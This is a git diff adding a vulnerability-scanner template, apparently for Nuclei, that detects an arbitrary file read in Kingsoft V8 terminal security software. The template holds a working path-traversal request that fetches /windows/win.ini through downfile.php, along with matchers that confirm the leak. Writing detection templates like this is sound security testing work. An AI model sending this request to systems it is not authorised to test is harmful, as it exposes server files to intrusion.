diff --git a/vulnerabilities/other/kingsoft-v8-file-read.yaml b/vulnerabilities/other/kingsoft-v8-file-read.yaml new file mode 100644 index 0000000000..ac8ee2eb9e --- /dev/null +++ b/vulnerabilities/other/kingsoft-v8-file-read.yaml @@ -0,0 +1,31 @@ +id: kingsoft-v8-file-read + +info: + name: Kingsoft V8 File Read + author: ritikchaddha + severity: high + reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: kingsoft,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/htmltopdf/downfile.php?filename=/windows/win.ini" + + redirects: false + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + - "[extensions]" + + - type: word + part: header + words: + - "application/zip" + + - type: status + status: + - 200